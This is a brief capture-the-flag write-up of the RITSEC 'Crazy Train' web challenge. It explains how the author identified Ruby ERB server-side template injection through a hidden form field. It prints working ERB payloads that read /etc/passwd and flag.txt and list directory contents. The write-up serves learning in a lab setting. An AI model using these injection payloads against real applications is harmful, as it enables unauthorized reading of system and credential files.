Crazy Train [Web – 250 Points]- RITSEC CTF

Challenge Description

fun.ritsec.club:3000

Author: hulto

I try many different vulnerable task at this challenge. but it not work. I notice this is hidden value article[a] . i try to insert input aaaaaaaaaaaaa it not work. but  when i insert the number 111111 it work.

So i try to use arithmetic calculation.

2 + 4 # not work

2 * 4 # work

5 / 2 # work

After searching google. it is Server Side Template Injection but there are many language there. ruby, python, php, java

it useful link

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20injections

I found this link and read it.

https://www.trustedsec.com/2017/09/rubyerb-template-injection/

To read /etc/passwd

<%= File.open('/etc/passwd').read %>

Yeah! it work.

Ok. Time to read flag.txt

<%= File.open('flag.txt').read %>

The flag is

RITSEC{[email protected]_bad_idea}

 

Note: There are nice trick to search directory. Credit to Aj Dumanhug.

<%= Dir.entries('.') %>

Thanks for reading.